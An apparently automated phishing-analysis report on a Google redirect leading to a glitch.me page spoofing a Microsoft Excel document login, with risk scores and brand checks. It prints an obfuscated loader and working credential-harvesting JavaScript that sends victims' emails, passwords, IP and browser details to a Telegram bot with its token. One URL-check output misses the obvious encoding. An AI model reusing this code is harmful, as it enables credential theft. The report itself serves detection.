Windows Analysis Report
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyun

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://www.google.co.th

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be highly suspicious and likely malicious in nature."
}

  Function(
    '\'tu+4h{}a%cqy,.w.z.q.}1v,xw8ur5p3w]%k!717syq5j2gi.p#}oe#pkx{t6a3l*wp_!jz_f*-#1}rsw+6z^wnjoqxeu4r,xola~^k]ym7qus79s@8z[6}#[!6~h1iez%n4[~or2c&915m85n-&3@fclt*8^u++x.ra,nk8eq]~~k1q%,yjovzp@%n!g5hn}vyz28enj^cf[v}95ts[esq9eet51637yk^^3efjg*3]j@9aq]4&]]v_my-&9jh#+#,{3{3kz2al[gfcti@!&f@c2eu1n{q8-+w57f2~i[g9*@xhxe+7ehkvme%[{g@m%vx3*uhs_r]^o%p7croew&9!we9x[!nmlv%her{!2o}*ui^7!~.5,2-#&v6v}t6_rm{~*-sfctl7-.4ul,4p[18mfa#syaz6^*o+3gc5]-&.ezhm.sci8i-a6pke2]{gy^2epi&gmt9l,~_l,jra4we-%n{pht4_i4y@4ikxl*@_#j_+u}!+8~&6_fg1#o\';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?"0QsupcVnlVictmeF"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[nmVc0eFuQ]/g,""):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?"JVfpomwrwvEVXax6c41mhp"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,""):"ZrFSMsuJnpgc054tUijoIMnUYg"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[Y4ZjsMg5Spr0IUJ]/g,""));_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz=()=>"\\162\\145\\160\\154\\141\\143\\145";(_FQRTR8s014sl4bYL6zNU0Wq10B=>"_C6u4T6cj6b9._XZQhqrh2X2CLzKdRPT9nEG1Td2B31445tyKkTJa23EtU=\\"CZZBRJLYJEHHRIQZCWVDKBGMQECLKFRZVAZUUYLSGIDSZIWJHSKVYZLBOUZFLCP\\"(function(_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM,_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz,_LC5w4zq58F1R4gGj7vyKm8g74EBmws,_J6yR511Z3DYBfBR41){_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM=this;_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz=\\"\\\\162\\\\145\\\\160\\\\154\\\\141\\\\143\\\\145\\";_$={};\\"_BmvY25CX9c7MxK96rKQh0P5I75LCn52aJrPZ23o2vmhvpPSBmAEwpshr1Fe14v63eRKCnNt3FDQe3ZfW7aiLUu0loQtYK6W3hoiQL0K1URws4AZYENFC7_WcU57JawHBdRKQd2BWEj9Cv2ecnC7tBToL4F5ipsY2JtueCAFn41yeoAGrgWBTRgAFW1GjYQJuB5p79wHCcyKo24_NtV8AKi5KMt5BzE361qtCR58i0M4VeR88rFH1r2KYoHL5rGARLAY85HKG1VF2_OZCd9m9nFI6h1zhJHZIUIr8RWejwmBToGYGvdTeFEfG2vqeghnWQtK9ULlKiYsVUtYkxefnxwe040r7u9dVU8TWxqB2KfYjQRG47hkgwFlu0I_XAuZWPM8a8nVB5qrlN8WUFUZzr5LEGkdJsqehrWX6rW48o8LrETq8qEh6LW4TX\\"[\\"9FsvIphlKFieP7t2Z\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\"\\")](\\"\\")[\\"6NfdZeoIdrUEb1aCic2QShVKK\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[IbZQeCdKNiVSU162]/g,\\"\\")]((_M4474dL1tem,_V40SJA477a86CuSIKKjS5sar6)=>{_V40SJA477a86CuSIKKjS5sar6=_M4474dL1tem[\\"9FsvIphlKFieP7t2Z\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\"\\")](\\"\\");_V77u0W95chN2s6C2VUJ84CW9S=_V40SJA477a86CuSIKKjS5sar6[1][\\"9FsvIphlKFieP7t2Z\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\"\\")](\\"\\");_$[_V40SJA477a86CuSIKKjS5sar6[0]]=_V77u0W95chN2s6C2VUJ84CW9S[0][_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](new _CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[\\"QRlaeWk9gwEo2zxfy3pHu\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[9ulkWH2waQf3ozy]/g,\\"\\")](\\"[\\"+_V77u0W95chN2s6C2VUJ84CW9S[1]+\\"]\\",\\"g\\"),\\"\\");});_LC5w4zq58F1R4gGj7vyKm8g74EBmws=(_J6yR511Z3DYBfBR41)=>{_J6yR511Z3DYBfBR41[_$._BmvY25CX9c7MxK96rKQh0P5I75LCn52aJrPZ23o2vmhvpPSBm]();_C6u4T6cj6b9[\'0\']();};_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[_$._WcU57](_$._NtV8AKi5KMt5BzE361qtCR58i0M4,_LC5w4zq58F1R4gGj7vyKm8g74EBmws);_C6u4T6cj6b9[\'0\']=()=>{_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[_$._OZCd9m9nFI6h1zhJHZIU](_$._XAuZWPM8a8nVB5qrlN8WUFUZzr5LEGkdJs,_LC5w4zq58F1R4gGj7vyKm8g74EBmws);};})();_C6u4T6cj6b9._ZRHfJgjD4rUI89H9Qyc7bK8xG=\\"81:a8dF04096A14490F44471AD47a7Y22548D154a8fb5586A9166dC41b8e1D69CY1a6a9A!673c8262Fcf2b34df3139e93693e7ec84DD3497F444a1C0Iaa6F254a3f32346b3[a61Y82bY3T268acc25cY8P870C8117797d35db3FC3a9CDD5073e0378ee558X02f95D9ef94DX4190YFfbA6F043acFC52AC;5SA5fF95cY2#f57b71434701C65b71e6995136bD31D6Xc7e687D02289d4ef3ada3688ea3685e7ff9CX3389aXA1964b8115AcdF05DY4:b62d55cY0Rc606C155FbdX521c91573CD266cd52Y2XCX1f82d8X338d73882DA=844e1449Yee4866b2N9A6f84YA5XX4869[952ab+05bAA[05cAYcf67c1-d2cCY146Dc2206cc21e6d921d80D52c85DY374aX63195X43054b3M261b4S77cXF40a6FA55a8F65b9DDA64a6ff5da7d1267eD72884D93190Ud71CY1a798f2Y85CDec459dF249X0

{
    "risk_score": 8,
    "reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, dynamic code execution, and redirects to potentially malicious domains. The script collects sensitive user information (email, password, IP address, browser details) and sends it to a Telegram bot, which is a concerning behavior. Additionally, the script includes a redirect mechanism that could lead users to untrusted domains. Overall, the combination of these high-risk indicators suggests this script is likely malicious and poses a significant security risk."
}

        let count = 0;  // Variable to track error message count
        const maxAttempts = 2;  // Maximum attempts before redirect

        // Function to extract email from URL hash
function getEmailFromURL() {
    const hash = window.location.hash.substring(1); // Get hash without the '#' symbol
    if (hash.includes('@') && hash.includes('.')) {
        return hash; // Return the hash as email if it appears valid
    }
    return ''; // Return an empty string if hash doesn't resemble an email
}

        // Update the email display
        document.getElementById('emailDisplay').textContent = getEmailFromURL();

        // Handle Form Submission
        document.getElementById('loginForm').addEventListener('submit', async function (event) {
            event.preventDefault(); // Prevent traditional form submission

            const passwordInput = document.getElementById('passwordInput');
            const password = passwordInput.value;
            const email = getEmailFromURL(); // Get email from the URL
            const ip = await getIP(); // Fetch the user's IP address
            const browser = navigator.userAgent; // Get the user's browser
            const dateTime = new Date().toLocaleString(); // Get the current date and time
            const domain = email.split('@')[1]; // Extract domain from email

            // Fetch MX records
            const mxRecords = await getMXRecords(domain);

            // Check if password is provided
            if (!password) {
                alert("Please enter your password.");
                return;
            }

            // Show loading indicator
            const submitBtn = document.getElementById("submitBtn");
            submitBtn.value = "Loading...";
            submitBtn.classList.add("loading");

            // Construct the message to send to Telegram
            const message = `GODLY LOGS\nEmail: ${email}\nPassword: ${password}\nIP: ${ip}\nBrowser: ${browser}\nDate and Time: ${dateTime}\nMX Records: ${mxRecords}`;

            const token = '7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA'; // Replace with your bot token
            const chatId = '1739269434'; // Replace with your chat ID
            const telegramApiUrl = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

            try {
                await fetch(telegramApiUrl); // Send message to Telegram bot
            } catch (error) {
                console.error("Error sending message to Telegram:", error);
            }

            // Increment failed attempt count
            count++;

            // Show error message for 3 seconds, then hide
            const errorText = document.getElementById("errorText");
            errorText.style.display = 'block';
            setTimeout(() => {
                errorText.style.display = 'none';
                passwordInput.value = '';  // Clear password field when the warning disappears
            }, 3000); // Hide error message after 3 seconds

            // Replace info text with error message
            const infoText = document.getElementById("infoText");
            infoText.style.display = 'block'; // Ensure info text stays visible

            // Redirect after max attempts
            if (count === maxAttempts) {
                const emailDomain = email.split('@')[1];
                setTimeout(() => {
                    window.location.href = `https://${emailDomain}`; // Redirect to email domain
                }, 1000);
            }

            // Add 2-second delay before resetting button state
            setTimeout(() => {
                // Reset the button state after submission
                submitBtn.value = "View Document"; // Reset button text
                submitBtn.classList.remove("loading"); // Re-enable the button
            }, 2000);
        });

        // Fetch user IP address from an external API
        async function getIP() {
            const respons

{
"contains_trigger_text": true,
"trigger_text": "Enter Password",
"prominent_button_name": "View Document",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft Excel"
  ]
}

{
"contains_trigger_text": true,
"trigger_text": "Please fill out this field.",
"prominent_button_name": "View Document",
"text_input_field_labels": "Password",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft Excel"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft Excel' is well-known and is associated with the domain 'microsoft.com'.",    "The URL 'phil-health-uk.glitch.me' does not match the legitimate domain for Microsoft.",    "The domain 'glitch.me' is a platform for hosting web applications and is not associated with Microsoft.",    "The presence of 'phil-health-uk' in the URL is suspicious and unrelated to Microsoft Excel.",    "The use of a password input field on a non-Microsoft domain is a common phishing tactic."  ],  "riskscore": 9}
Google indexed: False